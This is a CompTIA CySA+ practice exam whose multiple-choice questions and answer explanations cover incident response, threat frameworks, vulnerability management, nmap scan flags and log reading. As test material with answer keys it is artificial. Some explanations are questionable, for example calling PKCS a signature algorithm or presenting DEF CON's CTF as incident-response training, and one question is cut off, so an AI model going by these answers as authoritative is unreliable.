CompTIA CySA+ (CS0-003) Practice Exam #2
What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker? Zone transfers DNS registration DNSSEC CNAME
Zone transfers Zone transfers provide an easy way to send all the DNS information from one DNS server to another, but an attacker could also use it for reconnaissance against your organization. For this reason, most administrators disable zone transfers from untrusted servers. DNSSEC strengthens authentication in DNS using digital signatures based on public-key cryptography. CNAME is a Canonical Name Record or Alias Record. A type of resource record in the Domain Name System (DNS) specifies that one domain name is an alias of another canonical domain name. DNS registration is a service, which allows the owner of a domain name to use their name servers, which can match the domain name in question.
Which of the following policies should contain the requirements for removing a user's access when an employee is terminated? Data retention policy Account management policy Data classification policy Data ownership policy
Account management policy Account management policies describe the account life cycle from creation through decommissioning. Data ownership policies describe how ownership information is created and used. Data classification policies describe the classification structure of the data in use by an organization. Retention policies describe what data will be maintained and for how long it will be retained.
Your organization has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what key performance indicator (KPI) could you use? Number of false positives Mean time to remediate Alert volume Cost of incidents
Alert volume An increase in alert volume may correlate with an increase in detected incidents. By measuring this KPI, you can gain insights into the frequency of potential security incidents. While reducing false positives is important, this KPI does not directly provide information on the number of true security incidents being detected. This KPI measures how long it takes to address a security incident, not the number of incidents being detected. This KPI measures the financial impact of incidents, not their frequency or detection rate.
According to the Center for Internet Security's system design recommendation, which of the following control categories would contain information on the best security practices to implement within the SDLC? Malware defenses Inventory of authorized/unauthorized devices Application software security Controlled use of administrative privileges
Application software security Since the software development lifecycle (SDLC) is focused on building software applications, the best control category would be application software security. While all other documents hosted by the Center for Internet Security contain useful information, the application software security control is most likely to contain relevant information relating to best practices to implement in the SDLC.
What technology is NOT PKI x.509 compliant and cannot be used in various secure functions? SSL/TLS Blowfish AES PKCS
Blowfish AES, PKCS, and SSL/TLS are all compatible with x.509 and can be used in a wide variety of functions and purposes. AES is used for symmetric encryption. PKCS is used as a digital signature algorithm. SSL/TLS is used for secure key exchange.
You've been tasked to improve the operational efficiency of your security team. One of the solutions you've proposed is to incorporate the use of plugins. How could plugins enhance your team's operations? By increasing the workload on the team By decreasing the number of tools used By extending the capabilities of existing tools By replacing current tools Explanation
By extending the capabilities of existing tools Plugins are software components that add specific features to an existing software application, enabling customization and extension of capabilities without heavy coding. Plugins typically increase the functionality of existing tools rather than decreasing the number of tools used. Effective use of plugins should ideally reduce the workload on the team by automating tasks and increasing the efficiency of existing tools, not increase it. Plugins don't typically replace existing tools, but rather, they add to or improve the functionality of those tools.
During the massive SolarWinds supply chain attack of 2020, cybersecurity professionals worldwide had to react quickly to protect their networks. A specific annual cybersecurity conference often hosts a capture-the-flag (CTF) event where participants are challenged to solve a series of real-world scenarios for practicing their incident response skills. Which conference is this? DEF CON RSA Conference Black Hat Pwn2Own
DEF CON DEF CON is one of the world's largest and most notable hacker conventions, held annually in Las Vegas, Nevada. Its capture-the-flag (CTF) event is a competitive and practical exercise in incident response. Pwn2Own is a computer hacking contest held annually at the CanSecWest security conference. However, its main focus is on discovering new vulnerabilities, not on incident response exercises. While the Black Hat conference is another renowned cybersecurity event, its primary focus is on revealing new vulnerabilities, not on practical incident response exercises like CTF. RSA Conference is a series of IT security conferences, but it does not host the capture-the-flag events for practical incident response exercises.
Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting? Machine learning Continuous integration Deep learning Data enrichment
Data enrichment When data enrichment occurs, it could combine a threat intelligence feed with a log of NetFlow. This will allow the analyst to know if an IP address of interest is actually associated with a known APT. Machine learning and deep learning are forms of artificial intelligence that may be used to conduct data enrichment activities, but individually they are not sufficient to answer this question. Continuous integration is a software development method in which code updates are tested and committed to development or build server/code repositories rapidly, and is unrelated to this question.
Which analysis framework provides a graphical depiction of the attacker's approach relative to a kill chain? MITRE ATT&CK framework OpenIOC Diamond Model of Intrusion Analysis Lockheed Martin cyber kill chain
Diamond Model of Intrusion Analysis The Diamond Model provides an excellent methodology for communicating cyber events and allowing analysts to derive mitigation strategies implicitly. The Diamond Model is constructed around a graphical representation of an attacker's behavior. The MITRE ATT&CK framework provides explicit pseudo-code examples for detecting or mitigating a given threat within a network and ties specific behaviors back to individual actors. The Lockheed Martin cyber kill chain provides a general life cycle description of how attacks occur but do not deal with the specifics of how to mitigate. OpenIOC contains a depth of research on APTs but does not integrate the detections and mitigation strategy.
What is a reverse proxy commonly used for? Directing traffic to internal services if the contents of the traffic comply with the policy Allowing access to a virtual private cloud To obfuscate the origin of a user within a network To prevent the unauthorized use of cloud services from the local network
Directing traffic to internal services if the contents of the traffic comply with the policy A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users' devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server's response back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.
Your organization has implemented several cybersecurity tools, but there is a lack of coordination among the team in managing and facilitating automation. Which of the following actions would most effectively address this issue? Establishing clear roles and responsibilities for managing automation Limiting team access to tools Ignoring automation Buying more tools
Establishing clear roles and responsibilities for managing automation Establishing clear roles and responsibilities ensures everyone knows who is in charge of what parts of the automation process, reducing confusion and increasing coordination. Ignoring automation would be counterproductive. Automation can help improve efficiency and free up staff to focus on more complex tasks. Limiting team access to tools can lead to silos, inhibit teamwork, and reduce overall efficiency in managing and facilitating automation. Simply buying more tools doesn't necessarily improve coordination among the team. It may add complexity and could actually worsen the issue without proper management and integration.
A vulnerability scanner has reported that a vulnerability exists in the system. Upon validating the report, the analyst determines that this reported vulnerability does not exist on the system. What is the proper term for this situation? False positive False negative True positive True negative
False positive A false positive occurs when a scanner detects a vulnerability, but the vulnerability does not actually exist on the scanned system. A true positive occurs when a scanner detects a vulnerability, and the vulnerability exists on the scanned system. A true negative occurs when a scanner does not detect a vulnerability because the vulnerability does not exist on the scanned system. A false negative occurs when a scanner does not detect a vulnerability, but the vulnerability actually exists on the scanned system.
During the Sony Pictures hack in 2014, the attackers installed a wiper malware named Destover on Sony's systems to erase data. Which phase of the Cyber Kill Chain does this represent? Delivery Reconnaissance Actions and Objectives Installation
Installation The installation of the wiper malware Destover on Sony's systems represents the Installation phase of the Cyber Kill Chain. Delivery is about transmitting the weaponized payload to the victim, not installing a payload. Actions and Objectives is when the attacker fulfills their intent, not installing a payload. Reconnaissance is about gathering information about the target system, not installing a payload.
A critical vulnerability has been identified in Kelly Nexis Analytic's primary database system, which contains sensitive customer data. It is known that this vulnerability has been exploited in similar systems by attackers. How should the organization's risk score for this vulnerability be set? Moderate High Low Not Applicable
High Given the critical nature of the vulnerability, the sensitive data involved, and the fact that the vulnerability has been exploited before, a high-risk score would be appropriate. Given the critical nature of the vulnerability and the fact that it has been exploited in similar systems, a low -risk score would be inappropriate. Although this score is higher than low, the critical nature of the vulnerability and the fact that it has been exploited before warrant a higher risk score. Every identified vulnerability should be assigned a risk score to guide its management process.
You identified a critical vulnerability in one of your organization's databases. You researched a solution, but it will require the server to be taken offline during the patch installation. You have received permission from the Change Advisory Board to implement this emergency change at 11 pm once everyone has left the office. It is now 3 pm; what action(s) should you take now to best prepare for implementing this evening's change? (SELECT ALL THAT APPLY) Identify any potential risks associated with installing the patch Take the opportunity to install a new feature pack that has been requested Validate the installation of the patch in a staging environment Take the server offline at 10 pm in preparation for the change Ensure all stakeholders are informed of the planned outage Document the change in the change management system
Identify any potential risks associated with installing the patch Validate the installation of the patch in a staging environment Ensure all stakeholders are informed of the planned outage Document the change in the change management system You should send out a notification to the key stakeholders to ensure they are notified of the planned outage this evening. You should test and validate the patch in a staging environment before installing it on the production server. You should identify any potential risks associated with installing this patch. You should also document the change in the change management system. You should not take the server offline before your change window begins at 11 pm, which could affect users who are relying on the system. You should not take this opportunity to install any additional software, features, or patches unless you have received approval from the Change Advisory Board (CAB).
In the Mirai botnet attack, thousands of IoT devices, such as cameras and routers, were infected and used to launch large-scale DDoS attacks. In the Diamond Model of Intrusion Analysis, what do these IoT devices represent? Infrastructure Adversary Capability Victim
Infrastructure In the Diamond Model of Intrusion Analysis, the infected IoT devices used in the Mirai botnet attack represent the Infrastructure. The Victim is the target of the attack, not the resources used in the attack. Capability refers to the tools and techniques used in the attack, not the resources used in the attack. The Adversary is the entity conducting the attack, not the resources used in the attack.
What control provides the best protection against both SQL injection and cross-site scripting attacks? CSRF Input validation Hypervisors Network layer firewalls
Input validation Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.
The Security Operations Center Director for Dion Training received a pop-up message on his workstation that said, "You will regret firing me; just wait until Christmas!" He suspects the message came from a disgruntled former employee who may have set up a piece of software to create this pop-up on his machine. The director is now concerned that other code might be lurking within the network that could negatively affect Christmas. He directs his team of cybersecurity analysts to begin searching the network for this suspicious code. What type of malware should they be searching for? Logic bomb Worm Trojan Adware
Logic bomb A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files should they ever be terminated from the company. The director is concerned that a logic bomb may have been created and installed on his system or across the network before the analyst was fired.
Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat? MITRE ATT&CK framework Diamond Model of Intrusion Analysis Lockheed Martin cyber kill chain OpenIOC
MITRE ATT&CK framework The MITRE ATT&CK framework provides explicit pseudo-code examples for detecting or mitigating a given threat within a network and ties specific behaviors back to individual actors. The Diamond Model provides an excellent methodology for communicating cyber events and allowing an analyst to derive mitigation strategies implicitly. The Lockheed Martin cyber kill chain provides a general life cycle description of how attacks occur but do not deal with the specifics of how to mitigate. OpenIOC contains a depth of research on APTs but does not integrate the detections and mitigation strategy.
Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role? SaaS PaaS IaaS MSSP
MSSP A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role. This question may seem beyond the exam scope. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
Dion Training conducts weekly vulnerability scanning of their network and patches any identified issues within 24 hours. Which of the following best describes the company's risk response strategy? Avoidance Acceptance Mitigation Transference
Mitigation Risk mitigation is the overall process of reducing exposure to or the effects of risk factors, such as patching a vulnerable system. Transference (or sharing) means assigning risk to a third party (such as an insurance company or a contract with a supplier that defines liabilities). Avoidance means that the company stops doing the activity that is risk-bearing. Acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.
Due to new regulations, your organization's CIO has the information security team institute a vulnerability management program. What framework would BEST support this program's establishment? OWASP SANS SDLC NIST
NIST NIST (National Institute of Standards and Technology) produced a useful patch and vulnerability management program framework in its Special Publication (NIST SP 800-40). It would be useful during the program's establishment and provide a series of guidelines and best practices. SANS is a company specializing in cybersecurity and secure web application development training and sponsors the Global Information Assurance Certification (GIAC). The SDLC is the software development lifecycle. It is a method for dividing programming projects into separate phases. The Open Web Application Security Project (OWASP) is a community effort that provides free access to many secure programming resources. The resources provided include documentation on web app vulnerabilities and mitigation tactics, software tools used to identify and handle threats that target web applications, frameworks for secure development life cycle implementation, frameworks for penetration testing web apps, general secure coding best practices, guidelines for specific web-based languages, and more.
Which of the following is NOT considered a phase in the incident response cycle? Detection and analysis Preparation Containment, eradication, and recovery Notification and communication
Notification and communication There are four phases to the incident response cycle: preparation; detection and analysis; containment, eradication and recovery; and post-incident activity. While you will conduct some notifications and communication during your incident response, that term is not one of the four defined phases.
Which phase of the Cyber Kill Chain involves the gathering of information about the target system, its technologies, potential vulnerabilities, and users? Delivery Reconnaissance Weaponization Exploitation
Reconnaissance Reconnaissance is the initial phase of the Cyber Kill Chain that involves gathering information about the target system, its technologies, potential vulnerabilities, and users. Exploitation involves the execution of the delivered exploit, not gathering information about a target system. The weaponization phase involves packaging an exploit into a deliverable payload, not gathering information about a target system. The delivery phase involves transmitting the weaponized bundle to the victim, not gathering information about a target system.
Which of the following techniques would be the most appropriate solution to implementing a multi-factor authentication system? Smartcard and PIN Username and password Password and security question Fingerprint and retinal scan
Smartcard and PIN Multi-factor authentication (MFA) creates multiple security layers to help increase the confidence that the user requesting access is who they claim to be by requiring two distinct factors for authentication. These factors can be something you know (knowledge factor), something you have (possession factor), something you are (inheritance factor), something you do (action factor), or somewhere you are (location factor). By selecting a smartcard (something you have) and a PIN (something you know), you have implemented multi-factor authentication. Choosing a fingerprint and retinal scan would instead use only one factor (inheritance). Choosing a username, password, and security question would also be only using one factor (knowledge). For something to be considered multi-factor, you need items from at least two different authentication factor categories: knowledge, possession, inheritance, location, or action.
You're an incident response team member at a prominent financial institution. A recent intrusion, such as the infamous Equifax breach, has potentially exposed customer financial data. As part of your incident response duties, you need to liaise with the legal department to address potential liabilities and discuss the way forward. What primarily makes this interaction imperative? To request additional funding for cybersecurity tools To educate them about cybersecurity To inform them of the technical details of the breach To ensure compliance with data breach laws
To ensure compliance with data breach laws Data breach laws and regulations require institutions to take certain actions in the event of a data breach, which could include notifying affected customers and regulatory bodies within a specific time frame. Though educating everyone about cybersecurity is beneficial, it's not the primary reason for communicating with the legal department in this situation. The main aim is to ensure the company's response aligns with legal requirements. Although securing funding for improved cybersecurity could be a long-term goal, it's not the primary reason to communicate with the legal department after a breach. Legal should be involved to ensure regulatory compliance and address potential liabilities. While it's important to share some details with the legal team, they typically do not need to know the intricate technical aspects of the breach. The focus should be more on legal implications and steps to manage potential liabilities.
In the 2017 Equifax breach, the credit reporting company itself had vast amounts of sensitive personal data of consumers exposed due to a flaw in their Apache Struts web-application software. In the context of the Diamond Model of Intrusion Analysis, who does Equifax represent? Infrastructure Adversary Victim Capability
Victim In the Diamond Model of Intrusion Analysis, Equifax represents the Victim as their systems and data were targeted in the breach. The Adversary is the entity conducting the attack, not the target of the attack. Infrastructure refers to the physical and virtual resources used in the attack, not the targeted entity. Capability refers to the tools and techniques used in the attack, not the targeted entity.
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment? Sandboxing Bypass testing and deploy patches directly into the production environment Choose a few existing workstations to test the patches Virtualization
Virtualization When you have a limited amount of hardware resources to utilize but have a requirement to test multiple operating systems, you should set up a virtualized environment to test the patch across each operating system before deployment. You should never deploy patches directly into production without testing them first in the lab even on just a few workstations.
Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host? ftp netcat telnet wget
ftp FTP cannot be used to conduct a banner grab. A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.
Ted, a file server administrator, has noticed that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted looks up the IP address and determines that it is located in a foreign country. Ted contacts his company's security analyst, who verifies that the workstation's anti-malware solution is up-to-date, and the network's firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation? Impersonation MAC spoofing Session hijacking Zero-day
Zero-day Since the firewall wall is properly configured and the anti-malware solution is up-to-date, this signifies that a zero-day vulnerability may have been exploited. A zero-day vulnerability is an unknown vulnerability, so a patch or virus definition has not been released yet. A zero-day vulnerability refers to a hole in software that is unknown to the vendor. Hackers then exploit this security hole before the vendor becomes aware and hurries to fix it. This exploit is therefore called a zero-day attack. Zero-day attacks can include the use of infiltrating malware, spyware or allowing unwanted access to user information.
You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don't have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation? nmap -O nmap -sX nmap -sT nmap -sS
nmap -sT The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you d not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using an SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct a Xmas scan where the FIN, PSH, and URG flags are used in the scan. The -O flag would conduct an operating system detection scan of the target system.
Which of the following tools could be used to detect unexpected output from an application being managed or monitored? A behavior-based analysis tool A log analysis tool A signature-based detection tool Manual analysis
A behavior-based analysis tool A behavior-based analysis tool can capture/analyze normal behavior and then alert when an anomaly occurs. Configuring a behavior-based analysis tool requires more effort to set up properly, but it requires less work and manual monitoring once it is running. Signature-based detection is a process where a unique identifier is established about a known threat so that the threat can be identified in the future. Manual analysis requires a person to read all the output and determine if it is erroneous. A log analysis tool would only be useful to analyze the logs, but it would not detect unexpected output by itself. Instead, the log analysis tool would need to use a behavior-based or signature-based detection system.
A recent vulnerability scan found several vulnerabilities on an organization's public-facing IP addresses. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation? A website utilizing a self-signed SSL certificate A buffer overflow that is known to allow remote code execution An HTTP response that reveals an internal IP address A cryptographically weak encryption cipher
A buffer overflow that is known to allow remote code execution The most serious vulnerability discovered is one that could allow remote code execution to occur. Since this buffer overflow vulnerability is known to allow remote code execution, it must be mitigated first to prevent a security breach most effectively. While the other issues should be addressed eventually, you need to prioritize the most critical one (remote code execution) on a public-facing IP address. A public-facing IP address means the device is accessible from the internet.
A cybersecurity analyst has received an alert that sensors continuously observe well-known call home messages at their network boundary. Still, the organization's proxy firewall is properly configured to successfully drop the messages before leaving the network. Which of the following is MOST likely the cause of the call home messages being sent? An infected workstation is attempting to reach a command and control server (Correct) Malware is running on a company workstation or server A malicious insider is trying to exfiltrate information to a remote network An attacker is performing reconnaissance the organization's workstations
An infected workstation is attempting to reach a command and control server A call home message is an indicator of compromise known as beaconing. Beaconing usually occurs after a stage 1 malware program has been implanted on an organization's workstation or server, but that isn't the most correct answer to this question. Instead, beaconing indicates that a workstation or server is infected and tries to communicate with the attacker's command and control server. This beaconing will continue until the infected system (workstation or server) is found and cleared of the malware or until the botnet gives the infected host further instructions to perform (such as to attack). "Malware is running on a company workstation or server" is incorrect because we do not have positive verification of that based on this scenario. A beacon does not have to be malware. For example, it can simply be a single ping packet or DNS request being sent out every day at a certain time using the Windows task scheduler. Be careful on the exam to answer the question being asked and choose the "most" accurate answer. Since the call home signal is coming from the internal network and attempting to connect to an external server, it cannot be evidence of an attacker performing reconnaissance on your workstations. Also, nothing in the question is indicative of an insider threat trying to exfiltrate information since a call home message is generally minimal in size and not large enough to exfiltrate data.
An adversary compromises a web server in your network using a zero-day exploit and then uses it as a command and control (C2) server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate? Exploitation Persistence Command and Control Impact
Command and Control In the MITRE ATT&CK framework, Command and Control is a stage that describes how an adversary communicates with systems under their control within a target network. Persistence involves methods an adversary might use to maintain access within a network, but doesn't represent the use of a C2 server. Exploitation is part of gaining initial access but does not describe the use of compromised systems for command and control. Impact describes the objective of the adversary, often disruptive actions like data destruction or defacement. The use of a C2 server is not an impact action.
A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system's kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network? Conduct an OS fingerprinting scan across the network Conduct a service discovery scan on the network Manually review the syslog server's logs Conduct a packet capture of data traversing the server network
Conduct an OS fingerprinting scan across the network By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually review the Syslog server's log would take too long, and would not find servers that don't send their logs to the Syslog server. Conducting a packet capture would only allow you to find the server actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not identify which servers are running which operating systems effectively. For example, if you see that the Apache web service is running on port 80, it doesn't indicate running Linux or Windows as the underlying server.
Which type of control aims to minimize the impact of a security incident after it occurs? Corrective control Detective control Preventive control Deterrent control
Corrective control Corrective controls are implemented to mitigate or limit the damage after a security incident has occurred. Detective controls are designed to discover or detect security incidents that have already occurred. Deterrent controls are designed to discourage potential attackers. Preventive controls are designed to prevent security incidents from occurring.
Which of the following frameworks is commonly used for sharing threat intelligence information in a standardized format? Structured Threat Information Expression (STIX) Python HyperText Markup Language (HTML) Structured Query Language (SQL)
Structured Threat Information Expression (STIX) STIX is a standardized language for representing and sharing threat intelligence. Python is a general-purpose programming language, not a framework for sharing threat intelligence. HTML is a language for creating web pages, not for sharing threat intelligence. SQL is a language for managing and manipulating databases, not for sharing threat intelligence.
Which of the following actions should be done FIRST after forensically imaging a hard drive for evidence in an investigation? Encrypt the image file to ensure it maintains data integrity Digitally sign the image file to provide non-repudiation of the collection Encrypt the source drive to ensure an attacker cannot modify its contents Create a hash digest of the source drive and the image file to ensure they match
Create a hash digest of the source drive and the image file to ensure they match The first thing that must be done after acquiring a forensic disk image is to create a hash digest of the source drive and destination image file to ensure they match. A critical step in the presentation of evidence will be to prove that analysis has been performed on an identical image to the data present on the physical media and that neither data set has been tampered with. The standard means of proving this is to create a cryptographic hash or fingerprint of the disk contents and any derivative images made from it. When comparing hash values, you need to use the same algorithm used to create the reference value. While encrypting the image files is a good security practice to maintain the data's confidentiality, it does not provide data integrity like a hash digest does. Once imaged, the source drive should not be altered or encrypted. Digitally signing the image file could serve the function of non-repudiation, but it is an uncommon practice and not required to be performed.
Among the following vulnerabilities, which one was reported as a "Top 10" due to its common occurrence and the potential severity of its impact? Spectre Attack SolarWinds SUNBURST Attack Cross-Site Scripting (XSS) Poodle Attack
Cross-Site Scripting (XSS) XSS vulnerabilities are widespread across web applications and can lead to serious consequences, such as user data theft, making this the correct answer. The Spectre attack was an impactful hardware vulnerability, but it's not typically categorized as a top 10 vulnerability. While the Poodle Attack was significant and impacted SSL 3.0 protocol, it is not categorized as a top 10 widespread vulnerability. The SolarWinds SUNBURST was a severe, targeted supply chain attack, not a common vulnerability like XSS.
You are working as a junior cybersecurity analyst and utilize a SIEM to support investigations into ongoing incidents. The SIEM is configured to collect data from numerous sources across the network, including network sensors, routers, switches, firewalls, hosts, and servers. Unfortunately, due to the number of data sources, you have data about a particular event being detected by different sensors and devices. Which of the following must you ensure to make sense of all the data being collected by your SIEM before analyzing it? Data correlation Data retention Data recovery Data sanitization
Data correlation Data correlation is the first step in making sense of data from across numerous sensors. This will ensure the data is placed concerning other pieces of data within the system. For example, if your IDS detected an incident, host logs were collected, and your packet capture system collected the network traffic, the SIEM could be used to correlate all three pieces of information from these different systems to allow an analyst to understand the event better. By conducting data correlation, it allows an analyst to identify a pattern more clearly and take action. Data correlation should be performed as soon as the SIEM indexes the data.
As part of your organization's proactive threat hunting, you're considering gathering threat intelligence from the deep web and dark web. What could be a significant benefit of this approach? Eliminating all cyber threats Avoiding the need for other security measures Discovering potential threats before they impact your organization Increasing the organization's web presence
Discovering potential threats before they impact your organization Gathering threat intelligence from the deep web and dark web can help your organization identify emerging threats or planned attacks before they affect your network. Gathering threat intelligence from the deep web and dark web is not related to increasing an organization's web presence; it's about identifying potential cyber threats. While gathering intelligence can help identify and mitigate threats, it does not guarantee the elimination of all cyber threats. Gathering threat intelligence is a part of a broader security strategy and should be used in conjunction with other security measures, not in lieu of them.
You are the incident response team lead investigating a possible data breach at your company with 5 other analysts. A journalist contacts you and inquires about a press release from your company that indicates a breach has occurred. You quickly deny everything and then call the company's public relations officer to ask if a press release had been published, which it has not. Which of the following has likely occurred? Communication was limited to trusted parties Inadvertent release of information Release of PII and SPI Disclosing based on regulatory requirements
Inadvertent release of information It is most likely that an inadvertent release of information has occurred. This could have occurred due to communication not being limited to trusted parties or information being shared amongst the analyst using insecure communication methods. Based on the scenario, we cannot tell if the data breach (if one has actually occurred) involved the release of PII or SPI. Part of any good communications plan understands that you are required to disclose information based on regulatory requirements. When that disclosure occurs, it will usually be accompanied by a press release.
What is the primary importance of the 'Mean Time to Detect' (MTTD) metric in the context of incident response? It measures the effectiveness of detection mechanisms It calculates the total duration of the incident response process It determines the severity of an incident It gauges the impact of an incident on the organization
It measures the effectiveness of detection mechanisms The MTTD metric evaluates the efficiency of an organization's detection systems by measuring the time it takes to identify a potential incident. The MTTD metric does not directly measure the impact of an incident. It focuses on the detection capabilities of the organization. MTTD measures the time taken to detect an incident, not the severity of the incident. While MTTD contributes to the overall timeline of incident response, it specifically refers to the time from when an incident occurs to when it is detected, not the total duration of the response process.
You are reviewing the latest list of important web application security controls published by OWASP. Which of these items is LEAST likely to appear on that list? Leverage security frameworks and libraries Implement identity and authentication controls Implement appropriate access controls Obscure web interface locations
Obscure web interface locations The least likely option to appear in the list is to obscure web interface locations. This recommendation is based on security through obscurity and is not considered a good security practice. The other options are all considered best practices in designing web application security controls and creating software assurance in our programs.
requests you enter your social security number, date of birth, and email address to conduct a background check as part of the hiring process. Which of the following types of information has you been asked to provide? CUI PHI PII IP
PII Personally identifiable information (PII) is data used to identify, contact, or locate an individual. Information such as social security number (SSN), name, date of birth, email address, telephone number, street address, and biometric data is considered PII. Protected health information (PHI) refers to medical and insurance records, plus associated hospital and laboratory test results. Proprietary information or intellectual property (IP) is information created and owned by the company, typically about the products or services that they make or perform. Controlled Unclassified Information (CUI) is federal non-classified information that must be safeguarded by implementing a uniform set of requirements and information security controls directed at securing sensitive government information.
You are in the recovery steps of an incident response. Your analysis revealed that the attacker exploited an unpatched vulnerability on a public-facing web server as the initial intrusion vector in this incident. Which of the following mitigations should be implemented first during the recovery? Restrict shell commands per user or per host for least privilege purposes Disable unused user account and reset the administrator credentials Scan the network for additional instances of this vulnerability and patch the affected assets Restrict host access to peripheral protocols like USB and Bluetooth
Scan the network for additional instances of this vulnerability and patch the affected assets All of the options listed are the best security practices to implement before and after a detected intrusion, but scanning for additional instances of this vulnerability should be performed first. Often, an enterprise network uses the same baseline configuration for all servers and workstations. Therefore, if a vulnerability is exploited on one device (such as an insecure configuration), that same vulnerability could exist on many other assets across the network. During your recovery, you must identify if any other network systems share the same vulnerability and mitigate them. If you don't, the attacker could quickly reinfect your network by simply attacking another machine using the same techniques used during this intrusion. The other options listed are all examples of additional device hardening that should be conducted during recovery after you have identified the exploited vulnerability across the rest of the network.
Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend? Wait until next scheduled maintenance window to remediate the vulnerability Delay the remediation until the next major update of the SQL server occurs Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability Remediate the vulnerability immediately
Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability Jorge should recommend that emergency maintenance windows be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. But, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability and the outage's risk is to schedule an emergency maintenance window and patch the server during that time.
Evaluate the following log entry:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Based on this log entry, which of the following statements are true? The packet was blocked inbound to the network An attempted connection to the telnet service was prevented Packets are being blocked inbound to and outbound from the network MAC filtering is enabled on the firewall The packet was blocked outbound from the network An attempted connection to the ssh service was prevented
The packet was blocked inbound to the network An attempted connection to the telnet service was prevented Firewall log formats will vary by vendors, but this example is a commonly used format from the Linux iptable firewall tool. This log starts with the date and time of the event and provides some key pieces of information. For example, the word "drop" shows the action this log entry recorded. In this case, the firewall dropped a packet due to an ACL rule being applied. You can also see that the packet was detected on the inbound connection over eth0, so we know that packets are being scanned and blocked when they are headed inbound to the network. Next, we see the MAC address of the source device of the packet, the source (SRC) IP address, and the destination (DST) IP address. Further down, we see the source (SPT) and destination ports (DPT). In this case, the DPT is 23 and is a well-known port for telnet. Based on this single log entry, we cannot tell if packets are also being blocked when they are attempting to leave the network or if they are blocking connections to the ssh service (port 22) is also being conducting.
While reviewing the configuration settings of your company's IIS web servers, you notice that directory browsing is enabled. This misconfiguration could potentially expose which of the following to an attacker? The private keys of your SSL certificates The structure and content of your web directories Your company's user email addresses Your company's financial records
